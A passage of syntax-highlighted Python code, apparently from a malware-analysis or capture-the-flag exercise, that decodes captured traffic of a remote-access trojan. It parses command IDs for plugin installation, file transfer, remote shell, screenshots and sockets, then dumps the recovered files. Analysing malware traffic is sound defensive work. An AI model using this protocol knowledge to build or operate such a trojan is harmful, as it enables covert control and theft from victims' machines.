<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="n">computer_info</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="o">+</span><span class="n">download_plugin</span>
<span class="n">version</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">80</span><span class="p">]</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="n">computer_name</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">80</span><span class="p">:</span><span class="mi">208</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="n">user</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">208</span><span class="p">:</span><span class="mi">336</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="n">group</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">336</span><span class="p">:</span><span class="mi">848</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="n">others</span> <span class="o">=</span> <span class="n">computer_info</span><span class="p">[</span><span class="mi">848</span><span class="p">:</span><span class="mi">876</span><span class="p">]</span>
<span class="k">print</span> <span class="s">"===================== ComputerInfo ===================="</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"version = "</span> <span class="o">+</span> <span class="n">version</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"computer name = "</span> <span class="o">+</span> <span class="n">computer_name</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"user name = "</span> <span class="o">+</span> <span class="n">user</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"group name = "</span> <span class="o">+</span> <span class="n">group</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">hexdump</span><span class="p">(</span><span class="n">others</span><span class="p">)</span> <span class="c">#todo</span>
<span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="s">"cmd = 3 -> Processor::GetComputerInfo"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 4 -> Processor::ListPlugins"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">5</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 5 -> Processor::StartDownloadPlugin"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">plugin_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">6</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 6 -> Processor::DowloadPlugin"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"Downloading"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">plugin_id</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">plugin_type</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">]</span>
<span class="n">written</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">20</span><span class="p">:</span><span class="mi">24</span><span class="p">])</span>
<span class="n">plugin_size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">28</span><span class="p">])</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">28</span><span class="p">:</span><span class="mi">32</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"ID: </span><span class="si">%</span><span class="s">s | Type: </span><span class="si">%</span><span class="s">s | </span><span class="si">%</span><span class="s">d bytes (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">plugin_id</span><span class="p">,</span> <span class="n">plugin_type</span><span class="p">,</span> <span class="n">block</span><span class="p">,</span> <span class="n">written</span><span class="p">,</span> <span class="n">plugin_size</span><span class="p">)</span>
<span class="n">plugin_data</span> <span class="o">+=</span> <span class="n">download_plugin</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">7</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 7 -> Processor::InstallPlugin"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">download_plugin_id</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">download_plugin_type</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">]</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"download plugin id = "</span> <span class="o">+</span> <span class="n">download_plugin_id</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"./plugin_</span><span class="si">%</span><span class="s">s_</span><span class="si">%</span><span class="s">s.dll"</span> <span class="o">%</span> <span class="p">(</span><span class="n">download_plugin_id</span><span class="p">,</span> <span class="n">download_plugin_type</span><span class="p">),</span> <span class="n">plugin_data</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 8 -> Processor::Exit"</span>
<span class="k">elif</span> <span class="p">(</span><span class="n">cmd</span> <span class="o">==</span> <span class="mi">9</span> <span class="ow">or</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">10</span><span class="p">):</span>
<span class="k">return</span> <span class="s">"cmd = 9 or a -> Processor::Unused"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">11</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = b -> Processor::MessageBox"</span>
<span class="n">message</span> <span class="o">=</span> <span class="n">download_plugin_header</span> <span class="o">+</span> <span class="n">download_plugin</span>
<span class="k">print</span> <span class="s">"====================== MassageBox ====================="</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"MessageBox Title: </span><span class="si">%</span><span class="s">s "</span> <span class="o">%</span> <span class="n">massage</span><span class="p">[:</span><span class="mi">512</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">),</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"MassageBox Content: </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">message</span><span class="p">[</span><span class="mi">512</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">),</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">13</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = d -> Processor::ClearDownloadTask"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">14</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = e -> Processor::Online"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"password = "</span> <span class="o">+</span> <span class="n">download_plugin_header</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"error cmd id: "</span> <span class="o">+</span> <span class="n">cmd</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_file</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">global</span> <span class="n">file_data</span>
<span class="k">global</span> <span class="n">file_name</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"file -> get drive info"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"==============================================="</span>
<span class="n">drive_size</span> <span class="o">=</span> <span class="mi">552</span> <span class="c">#0x228</span>
<span class="n">num</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">)</span> <span class="o">/</span> <span class="n">drive_size</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">num</span><span class="p">):</span>
<span class="k">print</span> <span class="s">"drive "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">drive</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mh">0x228</span><span class="o">*</span><span class="n">i</span><span class="p">:</span><span class="mh">0x228</span><span class="o">*</span><span class="p">(</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">)]</span>
<span class="n">drive_name</span> <span class="o">=</span> <span class="n">drive</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="n">drive_type</span> <span class="o">=</span> <span class="n">drive</span><span class="p">[</span><span class="mh">0x128</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"drive name = "</span> <span class="o">+</span> <span class="n">drive_name</span><span class="p">,</span> <span class="s">"green"</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="n">drive_type</span><span class="p">,</span> <span class="s">"green"</span><span class="p">)</span>
<span class="n">drive</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 2"</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"file -> List Directory </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">260</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">),</span> <span class="s">'green'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 3"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"file -> Download"</span>
<span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">file_name</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">16</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="k">print</span> <span class="s">"file -> Download | </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">file_name</span>
<span class="n">file_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span> <span class="p">:</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="n">file_id</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">sent</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">24</span><span class="p">])</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">32</span><span class="p">])</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">40</span><span class="p">])</span>
<span class="k">if</span> <span class="n">sent</span> <span class="o">==</span> <span class="n">size</span><span class="p">:</span>
<span class="n">sha1</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">20</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"file -> Download | ID: </span><span class="si">%</span><span class="s">s | Finished | SHA1: </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">file_id</span><span class="p">,</span> <span class="n">sha1</span><span class="p">))</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"dump lab10.zip.cry"</span><span class="p">,</span> <span class="s">'red'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"</span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">sha1</span><span class="p">,</span> <span class="n">file_data</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"file -> Download | ID: </span><span class="si">%</span><span class="s">s | File Response </span><span class="si">%</span><span class="s">d bytes (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d) "</span> <span class="o">%</span> <span class="p">(</span><span class="n">file_id</span><span class="p">,</span> <span class="n">block</span><span class="p">,</span> <span class="n">sent</span><span class="p">,</span> <span class="n">size</span><span class="p">))</span>
<span class="n">file_data</span> <span class="o">+=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">40</span><span class="p">:</span><span class="mi">40</span><span class="o">+</span><span class="n">block</span><span class="p">]</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">5</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"file -> Close file"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">6</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 6"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"file -> Upload"</span>
<span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">filename</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">52</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="n">fid</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">print</span> <span class="s">"upload "</span> <span class="o">+</span> <span class="n">filename</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">28</span><span class="p">])</span>
<span class="n">sha1</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"file -> Upload: </span><span class="si">%</span><span class="s">s | </span><span class="si">%</span><span class="s">s | Size: </span><span class="si">%</span><span class="s">d | SHA1: </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">sha1</span><span class="p">)</span> <span class="p">)</span>
<span class="c"># file_data = ""</span>
<span class="n">file_name</span> <span class="o">=</span> <span class="n">filename</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\\</span><span class="s">"</span><span class="p">)[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">7</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"cmd = 7"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">sha1</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="n">written</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">])</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">28</span><span class="p">])</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">36</span><span class="p">])</span>
<span class="k">if</span> <span class="n">block</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"file -> Upload: </span><span class="si">%</span><span class="s">s | Finished (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">sha1</span><span class="p">,</span> <span class="n">written</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">((</span><span class="s">"Dump file </span><span class="si">%</span><span class="s">s..."</span> <span class="o">%</span> <span class="n">file_name</span><span class="p">),</span> <span class="s">'green'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="n">file_data</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"print -> Upload: </span><span class="si">%</span><span class="s">s | </span><span class="si">%</span><span class="s">d bytes (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">sha1</span><span class="p">,</span> <span class="n">block</span><span class="p">,</span> <span class="n">written</span><span class="p">,</span> <span class="n">size</span><span class="p">))</span>
<span class="n">file_data</span> <span class="o">+=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">40</span><span class="p">:</span><span class="mi">40</span><span class="o">+</span><span class="n">block</span><span class="p">]</span>
<span class="k">elif</span> <span class="p">(</span><span class="n">cmd</span> <span class="o">==</span> <span class="mi">8</span> <span class="ow">or</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">9</span> <span class="ow">or</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">10</span><span class="p">):</span>
<span class="k">print</span> <span class="s">"cmd = 8, 9, a file-> ping"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"file cmd error, cmd = </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">cmd</span><span class="p">,</span> <span class="s">'red'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_shell</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"shell cmd -> Start"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"shell cmd -> Close"</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="n">shell_cmd</span> <span class="o">=</span> <span class="n">download_data</span>
<span class="k">print</span> <span class="s">"shell cmd"</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="n">shell_cmd</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="s">"</span><span class="se">\\</span><span class="s">r</span><span class="se">\\</span><span class="s">n"</span><span class="p">)</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">],</span> <span class="s">'green'</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
<span class="n">shell_data</span> <span class="o">=</span> <span class="n">download_data</span>
<span class="k">print</span> <span class="s">"==================== shell response ===================="</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="n">shell_data</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">],</span> <span class="s">"green"</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"shell cmd error"</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_screen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">global</span> <span class="n">bmp_header</span>
<span class="k">global</span> <span class="n">bmp_body</span>
<span class="n">screen_data</span> <span class="o">=</span> <span class="n">download_data</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"screen -> take Screenshot"</span>
<span class="n">color_depths</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span> <span class="c">#color depths (1, 4, 8, 16, 24, 32, or 64 bits per pixel)</span>
<span class="k">print</span> <span class="s">"screen -> color depths: </span><span class="si">%</span><span class="s">d bits per pixel"</span> <span class="o">%</span> <span class="p">(</span><span class="n">color_depths</span><span class="p">)</span>
<span class="k">elif</span> <span class="p">(</span><span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span> <span class="ow">and</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">):</span>
<span class="k">print</span> <span class="s">"screen cmd = 2"</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">bmp_header</span> <span class="o">=</span> <span class="n">screen_data</span><span class="p">[</span><span class="mi">4</span><span class="p">:]</span>
<span class="n">width</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">height</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="n">color_depths</span> <span class="o">=</span> <span class="n">u16</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">[</span><span class="mi">14</span><span class="p">:</span><span class="mi">16</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"screen -> Response Header | size: </span><span class="si">%</span><span class="s">d | (</span><span class="si">%</span><span class="s">d x </span><span class="si">%</span><span class="s">d) </span><span class="si">%</span><span class="s">d bit"</span> <span class="o">%</span> <span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">width</span><span class="p">,</span> <span class="n">height</span><span class="p">,</span> <span class="n">color_depths</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"screen -> collect bitmap data"</span>
<span class="n">sent</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"screen -> Response | </span><span class="si">%</span><span class="s">d (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">sent</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span>
<span class="n">bmp_body</span> <span class="o">=</span> <span class="n">bmp_body</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="n">sent</span><span class="p">,</span> <span class="s">"</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span>
<span class="n">bmp_body</span> <span class="o">+=</span> <span class="n">screen_data</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="n">block</span><span class="o">+</span><span class="mi">12</span><span class="p">]</span>
<span class="k">if</span> <span class="n">sent</span> <span class="o">+</span> <span class="n">block</span> <span class="o">==</span> <span class="n">size</span><span class="p">:</span>
<span class="n">save_bmp</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">,</span> <span class="n">bmp_body</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"screen cmd error"</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_socket</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">global</span> <span class="n">send_data</span>
<span class="k">global</span> <span class="n">recv_data</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"socket -> start socket"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">port</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
